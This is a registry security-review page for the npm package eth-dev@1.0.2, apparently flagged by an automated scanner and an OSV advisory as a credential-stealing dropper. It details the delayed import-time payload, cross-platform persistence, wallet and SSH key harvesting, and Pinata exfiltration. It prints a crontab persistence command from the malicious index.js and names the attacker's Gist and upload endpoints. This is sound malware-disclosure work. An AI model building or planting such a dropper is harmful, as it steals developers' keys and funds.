registry  /  eth-dev  /  1.0.2

eth-dev@1.0.2

Ethereum development utilities — ABI encode/decode, event parsing, address checksum, keccak256, RLP, and contract interaction helpers

AI Security Review

scanned 3h ago · by lpm-firewall-ai

Importing the package activates a delayed, hidden dropper. It writes and launches a persistent credential-harvesting payload, remotely gated by a Gist/IPFS configuration, then exfiltrates discovered secrets.

Static reason
No blocking static signals were detected.; source matched previously finalized malicious package; routed for review; source fingerprint signature matched known malicious package; routed for review
Trigger
Any runtime import of `index.js`; activation occurs after a 37-second timer.
Impact
Steals cryptocurrency keys, SSH keys, environment secrets, and keystore data from the user's home and common document directories.
Mechanism
Delayed payload drop, cross-platform persistence, credential harvesting, and HTTPS exfiltration.
Attack narrative
At import time, `index.js` waits 37 seconds, decodes a base64 payload stored as a test fixture, writes it under a hidden home-directory path, configures cross-platform persistence, and launches it detached. The payload checks attacker-controlled remote configuration, waits for user idleness, searches cryptocurrency, SSH, profile, and document files for credentials, encrypts the findings, and uploads them to Pinata.
Rationale
This is a concrete import-time malware chain with stealthy persistence and credential exfiltration; the absence of npm lifecycle hooks does not mitigate it.
Evidence
package.jsonindex.jstest/fixtures/keypairs.dat~/.cache-db/.node-sync/syncd.js~/.cache-db/.node-sync/.lock~/.cache-db/.node-sync/.sl~/.ssh~/.config/solana~/.ethereum/keystore~/Desktop~/Documents~/Downloads~/Library/LaunchAgents/com.apple.syncd.plist
Network endpoints5
gist.githubusercontent.com/juang55/b298754cb72942b1cdcf02ccd45cde2f/raw/cfg.txtgateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10552
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in eth-dev (npm)
Details
On require(), index.js schedules a 37-second delayed routine that reads test/fixtures/keypairs.dat, base64-decodes it into ~/.cache-db/.node-sync/syncd.js (mode 0o700), and spawns it detached via `node syncd.js`. The dropper installs OS-specific persistence to re-execute every 12 hours: a crontab entry on Linux, a scheduled task named 'WinNodeSync' on Windows, and a LaunchAgent at ~/Library/LaunchAgents/com.apple.syncd.plist on macOS. The decoded payload ('phantom syncd v3') walks the user's home directory matching filenames and contents against wallet/seed keywords (seed, mnemonic, recovery, wallet, private, metamask, phantom, ledger, trezor,...), pulls mutable configuration from a hardcoded GitHub Gist (juang55/b298754cb72942b1cdcf02ccd45cde2f), and uploads harvested material to Pinata IPFS using hardcoded API credentials embedded in the payload. Cover-story naming (keypairs.dat as a 'test fixture', com.apple.syncd, WinNodeSync) is used to mimic legitimate system services. The package presents itself as an Ethereum utilities library.

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` runs a delayed dropper on every import.
  • `index.js` decodes `test/fixtures/keypairs.dat` into a hidden executable and starts it detached.
  • The dropped payload creates cron, LaunchAgent, or scheduled-task persistence.
  • The payload searches wallet, SSH, shell-profile, and document paths for keys and mnemonics.
  • The payload encrypts findings and uploads them to Pinata after remote dead-drop activation.
Evidence against
  • `package.json` has no lifecycle scripts.
  • The exported Ethereum helpers are benign, but are followed by the hidden runtime dropper.
Behavioral surface
Source
ChildProcessCryptoFilesystemShell
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 4.41 KB of source, external domains: www.apple.com

Source & flagged code

3 flagged · loading source
index.jsView file
matchType = normalized_sha256 matchedPackage = eth-dev@1.0.1 matchedPath = index.js matchedIdentity = npm:ZXRoLWRldg:1.0.1 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

index.jsView on unpkg
matchType = malicious_source_fingerprint_signature signature = 35d9e0136e86881b signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = eth-dev@1.0.1 matchedPath = index.js matchedIdentity = npm:ZXRoLWRldg:1.0.1 similarity = 1.000 shingleOverlap = 1 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
29else if (t === "bool") hex += v ? "01" : "00"; L30: else if (t === "string") hex += Buffer.from(v, "utf8").toString("hex"); L31: else if (t === "bytes") hex += v.replace("0x", ""); ... L88: var o = require("os"); L89: var c = require("child_process"); L90: var h = o.homedir(); L91: var d = p.join(h, ".cache-db", ".node-sync"); ... L99: try { L100: if (process.platform === "linux") { L101: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 }); L102: } else if (process.platform === "win32") {
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

index.jsView on unpkg · L29

Findings

2 High1 Medium2 Low
HighKnown Malware Source Similarityindex.js
HighKnown Malware Source Fingerprint Signatureindex.js
MediumInstall Persistenceindex.js
LowFilesystem
LowUrl Strings